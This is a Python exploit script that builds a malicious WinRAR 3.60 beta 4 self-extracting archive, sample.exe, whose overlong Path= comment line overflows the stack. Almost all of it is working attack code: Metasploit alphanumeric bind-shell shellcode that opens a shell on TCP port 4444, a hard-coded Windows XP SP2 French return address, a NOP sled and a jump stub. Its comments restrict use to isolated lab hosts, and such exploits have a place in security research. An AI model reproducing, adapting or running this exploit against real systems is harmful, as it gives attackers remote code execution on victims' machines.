信息来源:T4nk
"""
WinRAR - Stack Overflows in SelF-eXtracting Archives
====================================================
Tested Version(s)...........: WinRAR 3.60 beta 4
Original Author.............: posidron
Shellcode Stuffing..........: muts
XP SP2 French return address: JA
"""
import os, sys
winrar__: str = 'C:/WinRAR.exe'   # WinRAR CLI used to build the SFX; edit to match the local install
sfxnfo__: str = "comment.txt"     # temp file holding the SFX comment script with the overlong Path= line; removed at the end
result__: str = "sample.exe"      # output: the self-extracting archive that carries the overflow trigger
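# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
# Metasploit bind-shell payload (alphanumeric-encoded): when the overflow fires
# on the victim it opens a command shell listening on TCP/4444.  The generated
# sample.exe is therefore a live exploit -- only build/run it on an isolated
# lab host.  The bytes are the exact encoder output; len(sc) must stay 709 so
# the offsets used for buf below line up.  Written as a bytes literal so the
# same source works under Python 2 and 3 (on Python 2 b"..." is plain str).
sc = (
    b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    b"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    b"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    b"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    b"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
    b"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
    b"\x4e\x36\x46\x32\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
    b"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
    b"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58"
    b"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
    b"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
    b"\x46\x4f\x4b\x43\x46\x55\x46\x52\x4a\x52\x45\x47\x45\x4e\x4b\x48"
    b"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54"
    b"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x42\x4b\x48"
    b"\x49\x48\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d"
    b"\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x48\x42\x54\x4e\x50\x4b\x48"
    b"\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36"
    b"\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
    b"\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x57\x43\x57"
    b"\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
    b"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"
    b"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
    b"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
    b"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
    b"\x43\x45\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x51"
    b"\x4e\x35\x48\x56\x43\x45\x49\x38\x41\x4e\x45\x59\x4a\x56\x46\x4a"
    b"\x4c\x51\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
    b"\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
    b"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
    b"\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d"
    b"\x42\x55\x46\x55\x46\x45\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x46"
    b"\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
    b"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x36"
    b"\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x32\x4e\x4c"
    b"\x49\x58\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
    b"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x32"
    b"\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
    b"\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
    b"\x48\x4d\x4b\x55\x47\x45\x44\x55\x41\x55\x41\x45\x41\x45\x4c\x56"
    b"\x41\x30\x41\x35\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
    b"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46"
    b"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
    b"\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
    b"\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
    b"\x4f\x4f\x42\x4d\x5a"
)

# Return address written over the saved return pointer.  It is a hard-coded
# kernel32 gadget for ONE build (XP SP2, French locale); on any other
# build/locale the stub will most likely just crash instead of reaching sc.
# The alternative below is the original author's address for (presumably
# English) XP SP2 -- swap it in for that target.
#ret_addr = b"\x3c\x15\xdc\x77"   # JMP ESP XP SP2
ret_addr = b"\x5D\x38\x82\x7C"    # 0x7C82385D call ESP Kernel32 XP SP2 FRENCH

# SFX comment script that triggers the overflow.  Layout of the Path= value:
# NOP sled + sc padded to exactly 2035 bytes, then ret_addr, then 8 NOPs and
# a 4-byte short-jmp stub kept verbatim from the original author (re-verify
# the landing spot in a debugger before porting to another target).  The
# guard keeps a longer payload from silently shifting the return-address
# offset (a negative repeat count would just yield an empty sled).
pad_len = 2035 - len(sc)
if pad_len < 0:
    raise ValueError("shellcode is %d bytes; it must fit in 2035" % len(sc))
buf = (
    b"Path="
    + b"\x90" * pad_len
    + sc
    + ret_addr
    + b"\x90" * 8
    + b"\xEB\x30\x90\x90"
    + b"\r\nSavePath\r\n"
)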
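def _run_winrar(*args):
    """Run the WinRAR CLI (winrar__) with *args* and wait for it.

    Each element of *args* becomes one argv entry; on Windows spawnv joins
    them with spaces, which is the same command line the original single
    string produced.  Exits via sys.exit() with a message if the binary
    cannot be launched (OSError) or returns a non-zero code, so a missing
    or failing WinRAR no longer leaves a half-built sample.exe unnoticed.
    """
    argv = [winrar__] + list(args)
    try:
        rc = os.spawnv(os.P_WAIT, winrar__, argv)
    except OSError:
        sys.exit("Error: unable to run WinRAR at: " + winrar__)
    if rc != 0:
        sys.exit("Error: WinRAR exited with code %d" % rc)


def main():
    """Write the SFX comment file, build sample.exe with WinRAR, clean up.

    Uses the module-level buf, winrar__, sfxnfo__ and result__.  The
    temporary comment file is removed even when WinRAR fails.  sample.exe
    is deliberately NOT executed here: it is a live exploit (bind shell,
    see the payload comment) and must only be run on an isolated test host.
    Exits via sys.exit() with a message when the comment file cannot be
    written.  Output uses sys.stdout.write/print(...) so the script runs
    unchanged under Python 2 and 3.
    """
    try:
        with open(sfxnfo__, "wb") as info:
            info.write(buf)
    except IOError:
        sys.exit("Error: unable to create: " + sfxnfo__)
    try:
        sys.stdout.write("Creating archive: ")
        sys.stdout.flush()
        # The SFX needs some file inside it; this script itself is used.
        _run_winrar("a", "-sfx", "-s", result__, __file__)
        # Attach the comment script carrying the overlong Path= line.
        _run_winrar("c", "-z" + sfxnfo__, result__)
        print("done.")
        # debug only!  Running the result triggers the overflow on THIS host
        # and leaves a listening shell behind; keep it disabled.
        #sys.stdout.write("Executing: ")
        #os.spawnv(os.P_WAIT, result__, [result__, ""])
        #print("done.")
    finally:
        sys.stdout.write("Cleaning up: ")
        os.remove(sfxnfo__)
        print("done.")


if __name__ == "__main__":
    main()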